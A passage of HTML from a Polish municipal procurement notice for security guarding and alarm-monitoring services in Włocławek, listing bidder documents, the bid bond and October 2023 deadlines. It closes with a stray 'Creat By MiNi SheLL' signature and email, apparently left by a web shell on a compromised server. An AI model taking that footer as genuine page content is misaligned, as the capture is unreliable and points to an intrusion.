usytuowanie (Dz. U. z 2022 r., poz. 1225). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane. Jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy <br/>– według wzoru stanowiącego załącznik nr 5 do SWZ;<br/>b)	dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 500 000,00 złotych.<br/>c)	koncesja na wykonywanie działalności gospodarczej w zakresie usług ochrony osób i mienia realizowanych w formie bezpośredniej ochrony fizycznej oraz zabezpieczenia technicznego, udzielona przez ministra właściwego do spraw wewnętrznych, zgodnie z art. 15 ust. 1 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia;<br/>d)	pozwolenie radiowe Prezesa Urzędu Komunikacji Elektronicznej, o którym mowa w art. 143 ustawy z dnia 16 lipca 2014 r. – Prawo telekomunikacyjne, na używanie urządzeń radiowych (pozwalające na odbieranie sygnałów z lokalnego systemu alarmowego drogą radiową), obejmujące swym zasięgiem miasto Włocławek.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Nie dotyczy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	formularz ofertowy – załącznik nr 1 do SWZ, <br/>2)	oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, składane na podstawie art. 125 ust. 1 ustawy Pzp – wzór oświadczenia zawarto w załączniku nr 2 do SWZ, <br/>z zastrzeżeniem, że:<br/>a)	w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców - oświadczenie, o którym mowa w ppkt 2, składa każdy z Wykonawców, przy czym w części dotyczącej spełnienia warunków udziału w postępowaniu tylko w zakresie, w jakim każdy z wykonawców wykazu-je spełnianie warunków udziału w postępowaniu;<br/>b)	w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby - Wykonawca wraz z oświadczeniem, o którym mowa w ppkt 2, przedstawia także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby,<br/>3)	pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik,<br/>4)	w przypadku oferty składanej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia i/lub zawarcia umowy w sprawie zamówienia w imieniu Wyko-nawców wspólnie ubiegających się o udzielenie zamówienia, <br/>5)	dokument potwierdzający wniesienie wadium, jeżeli zamawiający żądał wniesienia wadium,<br/>6)	w przypadku polegania przez Wykonawcę na zdolnościach lub sytuacji podmiotów udostępniających zasoby - zobowiązanie podmiotu do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia - według wzoru stanowiącego załącznik nr 3 do SWZ - lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, <br/>7)	w przypadku oferty składanej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia w sytuacji, o której mowa w art. 117 ust. 2 i 3 Ustawy Pzp - wykonawcy wspólnie ubiegający się o udzielenie zamówienia oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy - według wzoru stanowiącego załącznik nr 4 do SWZ.<br/>8) oświadczenie na: <br/>potwierdzenie posiadania przez Wykonawcę statusu zakładu pracy chronionej, zakładu aktywności zawodowej, spółdzielni socjalnej lub innego Wykonawcy, którego głównym celem, lub głównym celem działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie jest społeczna i zawodowa integracja osób niepełnosprawnych w rozumieniu ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych <br/>oraz <br/>posiadanie procentowego wskaźnika zatrudnienia osób niepełnosprawnych w rozumieniu ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, zgodnie z załącznikiem nr 7 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest przed upływem terminu składania ofert wnieść wadium w wysokości 6 000,00 PLN (słownie: sześć tysięcy złotych 00/100). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania istotnych zmian umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z projektowanymi postanowienia umowy, stanowiącymi załącznik nr 6 do SWZ oraz ustawą PZP. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">W prowadzonym postępowaniu Wykonawcy składają swoje oferty zapośrednictwem Platformy Przetargowej Urzędu Miasta Włocławek dostępnej pod adresem:https://umwloclawek.logintrade.net/rejestracja/ustawowe.html.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-06 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-11-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wykluczy z postępowania Wykonawcę na podstawie przesłanek wynikających z art. 7 ust. 1 ustawy z dnia 15 kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r. poz. 129).

Creat By MiNi SheLL
Email: jattceo@gmail.com